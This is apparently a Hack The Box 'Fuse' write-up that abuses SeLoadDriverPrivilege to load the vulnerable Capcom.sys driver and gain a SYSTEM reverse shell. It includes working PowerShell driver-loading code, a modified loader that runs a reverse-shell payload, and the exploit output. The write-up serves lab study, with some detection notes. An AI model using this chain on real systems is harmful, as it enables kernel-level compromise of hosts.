Vulnerable Driver Load


Since the svc-print user has SeLoadDriverPrivilege enabled, I can take advantage of that by loading a vulnerable or malicious driver onto the target system to escalate privileges. The privilege only lets a process ask the kernel to load a driver; the image still has to pass Driver Signature Enforcement, which is why the usual approach is a legitimately signed driver with a known kernel code execution bug rather than a self-built one.

In order to conduct this operation, the following 3 items are required:

  • A Driver Loader
  • A Vulnerable Driver
  • An Exploit

Driver Loader (EoPLoadDriver)


I will be using the EoPLoadDriver made by TarlogicSecurity. It enables SeLoadDriverPrivilege in its own token, registers the driver under a service key in the current user's registry hive (HKCU) and calls NtLoadDriver on that key. That last detail is what makes the technique work without write access to HKLM\SYSTEM\CurrentControlSet\Services.

Vulnerable Driver (Capcom)


I will be using a very old and vulnerable driver, Capcom.sys. It shipped in 2016 as the anti-cheat component of Street Fighter V and exposes an IOCTL that runs caller-supplied code in kernel mode, which is exactly what the exploit below abuses. It is signed by Capcom, so Driver Signature Enforcement accepts it, and it is on Microsoft's vulnerable driver blocklist, so hosts enforcing that list refuse it. I grabbed a copy of it from an exploit repo.
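Before compiling anything, it is worth checking whether the target will let the driver load at all. The following is an added example (not code from the original post or from either tool), written for the svc-print WinRM session; the driver path is an assumption matching the upload location used later on this page.

```powershell
# Added example: pre-flight checks for a SeLoadDriverPrivilege abuse.
# Assumed driver path matches where Capcom.sys is uploaded later on this page.
function Test-DriverLoadPrereqs {
    param([string] $DriverPath = 'C:\tmp\SeLoadDriverPrivilege\Capcom.sys')

    # 1. Is SeLoadDriverPrivilege in the token at all? whoami /priv shows it as Enabled
    #    or Disabled; a Disabled entry is still usable because the loader enables it
    #    itself. If the line is absent, the token does not hold it and this path is dead.
    $privLine = (whoami /priv) | Select-String -SimpleMatch 'SeLoadDriverPrivilege'
    $hasPriv  = [bool] $privLine

    # 2. Is HVCI running? With HVCI on, Microsoft's vulnerable driver blocklist
    #    (which lists Capcom.sys) is enforced and NtLoadDriver refuses the image.
    #    SecurityServicesRunning: 1 = Credential Guard, 2 = HVCI.
    $dg   = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $hvci = [bool] ($dg.SecurityServicesRunning -contains 2)

    # 3. The separate "Microsoft Vulnerable Driver Blocklist" switch (Windows 11 22H2
    #    and later); 1 means the list is enforced.
    $ci        = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\CI\Config' -ErrorAction SilentlyContinue
    $blocklist = $ci.VulnerableDriverBlocklistEnable

    # 4. Who signed the driver? x64 DSE only loads signed kernel images, so an
    #    unsigned driver fails here regardless of the privilege.
    $sig = Get-AuthenticodeSignature -FilePath $DriverPath -ErrorAction SilentlyContinue

    [pscustomobject]@{
        SeLoadDriverPrivilege           = if ($hasPriv) { ($privLine.Line -split '\s{2,}')[-1] } else { 'absent' }
        HvciRunning                     = $hvci
        VulnerableDriverBlocklistEnable = $blocklist
        DriverSigner                    = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { 'unsigned/unknown' }
        SignatureStatus                 = if ($sig) { $sig.Status } else { 'n/a' }
    }
}

Test-DriverLoadPrereqs
```

If the privilege is absent or HVCI is running, the rest of this section will not work and a different escalation path is needed. On the defensive side, the same load shows up as Sysmon Event ID 6 (Driver loaded), which records the image path, hashes and signer of every driver the kernel loads.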

Exploit


There were multiple trials and errors before landing on this particular exploit. This one works well.

Compile


Unlike the [[#vulnerable driver (capcom)|driver]] itself, both the [[#Driver Loader (EoPLoadDriver)|Driver Loader]] and the [[#Exploit|Exploit]] need to be compiled prior to deployment and exploitation. I will be using Visual Studio for compilation.

I will start with the driver loader

Compiling EoPLoadDriver


I will first create a new project with the Console App option for C++

Call it EoPLoadDriver

Looking at the source code, it's launching C:\Windows\System32\cmd.exe upon successful exploitation. This would work if I had an RDP session, but I don't, so I would need to change that.

I changed it to point to the location of the payload, which will be at C:\tmp\SeLoadDriverPrivilege\pe.exe. This should execute the reverse shell executable instead of spawning a new process with cmd.exe.

Initial build attempt failed due to a header file not being present. stdafx.h is the issue, and I don’t need that.

I will just comment it out.

Build succeeded despite a small warning.

EoPLoadDriver.exe is all set and ready

Compiling Exploit


I did pretty much the same procedure as the driver loader and compiled the exploit. It worked right out of the box this time. No modifying or commenting out needed.

ExploitCapcom.exe is all set and ready.

Exploitation


*Evil-WinRM* PS C:\tmp\SeLoadDriverPrivilege> upload SeLoadDriverPrivilege/capcom/Capcom.sys C:\tmp\SeLoadDriverPrivilege\Capcom.sys
Info: Uploading SeLoadDriverPrivilege/capcom/Capcom.sys to C:\tmp\SeLoadDriverPrivilege\Capcom.sys
Data: 14100 bytes of 14100 bytes copied
 
Info: Upload successful!
 
*Evil-WinRM* PS C:\tmp\SeLoadDriverPrivilege> upload SeLoadDriverPrivilege/capcom/ExploitCapcom.exe C:\tmp\SeLoadDriverPrivilege\ExploitCapcom.exe
Info: Uploading SeLoadDriverPrivilege/capcom/ExploitCapcom.exe to C:\tmp\SeLoadDriverPrivilege\ExploitCapcom.exe
Data: 365224 bytes of 365224 bytes copied
 
Info: Upload successful!
 
*Evil-WinRM* PS C:\tmp\SeLoadDriverPrivilege> upload SeLoadDriverPrivilege/EoPLoadDriver.exe C:\tmp\SeLoadDriverPrivilege\EoPLoadDriver.exe
Info: Uploading SeLoadDriverPrivilege/EoPLoadDriver.exe to C:\tmp\SeLoadDriverPrivilege\EoPLoadDriver.exe
Data: 20480 bytes of 20480 bytes copied
 
Info: Upload successful!
 
*Evil-WinRM* PS C:\tmp\SeLoadDriverPrivilege> dir
 
 
    Directory: C:\tmp\SeLoadDriverPrivilege
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/2/2023   2:01 PM          10576 Capcom.sys
-a----         2/2/2023   2:02 PM          15360 EoPLoadDriver.exe
-a----         2/2/2023   2:02 PM         273920 ExploitCapcom.exe
-a----         2/2/2023   2:02 PM           8192 pe.exe

I transferred all 3 necessary items and the payload to the target system over the existing WinRM session. The byte counts Evil-WinRM prints during upload are larger than the on-disk sizes in the dir listing because the transfer is base64-encoded (20480 = 15360 x 4/3 for EoPLoadDriver.exe).

*Evil-WinRM* PS C:\tmp\SeLoadDriverPrivilege> ./EoPLoadDriver.exe -h
Tarlogic Security
Usage: EOPLOADDRIVER.exe RegistryServicePath DriverImagePath
   eg: EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\Users\Username\Desktop\Driver.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0

I loaded the Capcom.sys driver with EoPLoadDriver and it exited with NTSTATUS 00000000 (STATUS_SUCCESS). The service key the tool created lives in my own hive at \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService, and the driver is now loaded in the kernel with its device reachable from user mode.
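To make the three steps behind that output explicit, here is an added example (not EoPLoadDriver's own code) that performs the same privilege enable, HKCU service key creation and NtLoadDriver call from PowerShell, plus the unload and key removal that the tool does not do. The service name MyService and the driver path are assumptions matching this page.

```powershell
# Added example: what EoPLoadDriver does, step by step, plus cleanup.
# Assumptions: driver already at $DriverPath, service name 'MyService'.
$ntdll = @'
using System;
using System.Runtime.InteropServices;
public static class NtDrv {
    [StructLayout(LayoutKind.Sequential)]
    public struct UNICODE_STRING { public ushort Length; public ushort MaximumLength; public IntPtr Buffer; }
    // BOOLEAN is one byte, so byte is used instead of bool to avoid 4-byte BOOL marshalling.
    [DllImport("ntdll.dll")] public static extern int RtlAdjustPrivilege(int Privilege, byte Enable, byte CurrentThread, out byte Enabled);
    [DllImport("ntdll.dll")] public static extern int NtLoadDriver(ref UNICODE_STRING DriverServiceName);
    [DllImport("ntdll.dll")] public static extern int NtUnloadDriver(ref UNICODE_STRING DriverServiceName);
}
'@
Add-Type -TypeDefinition $ntdll

function Invoke-DriverLoad {
    param(
        [Parameter(Mandatory)] [string] $DriverPath,
        [string] $ServiceName = 'MyService',
        [switch] $Unload
    )
    # Step 1: enable SeLoadDriverPrivilege (LUID 10) in this process token. The token
    # must already hold the privilege; this only flips it from Disabled to Enabled.
    $was = [byte] 0
    $st = [NtDrv]::RtlAdjustPrivilege(10, 1, 0, [ref] $was)
    if ($st -ne 0) { throw ('RtlAdjustPrivilege failed, NTSTATUS 0x{0:X8} (0xC0000061 = privilege not held)' -f $st) }

    # Step 2: NtLoadDriver takes a registry path to a service key. svc-print cannot write
    # HKLM\SYSTEM\CurrentControlSet\Services, but the kernel accepts a key in the user's
    # own hive addressed as \Registry\User\<SID>\..., the path EoPLoadDriver prints.
    $sid    = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
    $key    = "HKCU:\System\CurrentControlSet\$ServiceName"
    $ntPath = "\Registry\User\$sid\System\CurrentControlSet\$ServiceName"

    # Build the UNICODE_STRING by hand so its Buffer stays valid for the native call.
    $buf = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ntPath)
    $us  = New-Object -TypeName 'NtDrv+UNICODE_STRING'
    $us.Length        = [uint16] ($ntPath.Length * 2)
    $us.MaximumLength = [uint16] (($ntPath.Length + 1) * 2)
    $us.Buffer        = $buf
    try {
        if ($Unload) {
            # Cleanup: unload the driver (also needs SeLoadDriverPrivilege), then drop the key.
            $st = [NtDrv]::NtUnloadDriver([ref] $us)
            Remove-Item -Path $key -Recurse -Force -ErrorAction SilentlyContinue
            return ('NtUnloadDriver: NTSTATUS 0x{0:X8}' -f $st)
        }
        New-Item -Path $key -Force | Out-Null
        # ImagePath in NT object-manager form (\??\C:\...); Type 1 = SERVICE_KERNEL_DRIVER.
        Set-ItemProperty -Path $key -Name ImagePath -Value "\??\$DriverPath"
        Set-ItemProperty -Path $key -Name Type      -Value 1 -Type DWord

        # Step 3: ask the kernel to load it. 0 = STATUS_SUCCESS (what the page shows),
        # 0xC000010E = image already loaded, 0xC0000428 = image hash rejected (DSE/blocklist).
        $st = [NtDrv]::NtLoadDriver([ref] $us)
        return ('NtLoadDriver: NTSTATUS 0x{0:X8}' -f $st)
    } finally {
        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($buf)
    }
}

Invoke-DriverLoad -DriverPath 'C:\tmp\SeLoadDriverPrivilege\Capcom.sys'
# Once ExploitCapcom.exe has done its job:
# Invoke-DriverLoad -DriverPath 'C:\tmp\SeLoadDriverPrivilege\Capcom.sys' -Unload
```

The unload step matters on a real engagement: a loaded Capcom.sys is a ring-0 code execution primitive for any local user who can open its device, and the HKCU service key would otherwise persist as a plain artefact of the technique.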

*Evil-WinRM* PS C:\tmp\SeLoadDriverPrivilege> ./ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 0000025479C80008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program

Launching the exploit!

┌──(kali㉿kali)-[~/…/htb/labs/fuse/SeLoadDriverPrivilege]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.193] 53104
Windows PowerShell running as user svc-print on FUSE
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\tmp\SeLoadDriverPrivilege> whoami
nt authority\system
PS C:\tmp\SeLoadDriverPrivilege> hostname
Fuse
PS C:\tmp\SeLoadDriverPrivilege> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::bb
   IPv6 Address. . . . . . . . . . . : dead:beef::786e:10c2:1173:5102
   Link-local IPv6 Address . . . . . : fe80::786e:10c2:1173:5102%5
   IPv4 Address. . . . . . . . . . . : 10.10.10.193
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%5
                                       10.10.10.2
 
Tunnel adapter isatap.{AF2C7A34-A136-4854-894E-84F30DA6C214}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : htb

Boom! Domain-level compromise.